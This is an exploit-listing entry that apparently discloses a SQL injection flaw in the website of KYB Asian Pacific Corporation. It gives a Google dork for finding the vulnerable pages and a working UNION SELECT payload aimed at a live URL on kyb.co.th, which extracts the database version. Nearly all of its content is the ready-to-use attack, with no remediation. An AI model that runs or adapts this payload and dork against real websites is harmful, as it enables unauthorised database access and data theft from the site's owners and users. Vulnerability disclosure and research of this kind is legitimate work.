********************************************************* #Exploit Title: KYB Asian Pacific Corporation - SQL Injection Vulnerability #Date: 2022-03-22 #Exploit Author: Jayson San Buenaventura #Google Dork: "KYB Asian Pacific Corporation" #Category: webapps #Tested On: Kali Linux, CyberFox Proof of Concept: Search google Dork: "KYB Asian Pacific Corporation" ### Demo : https://www.kyb.co.th/index.php?page=newsdetail&id=-15'+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+ ********************************************************* #Discovered by: Jayson San Buenaventura #Facebook: Jayson Cabrillas San Buenaventura #Email: sanbuenaventurajayson27@gmail.com *********************************************************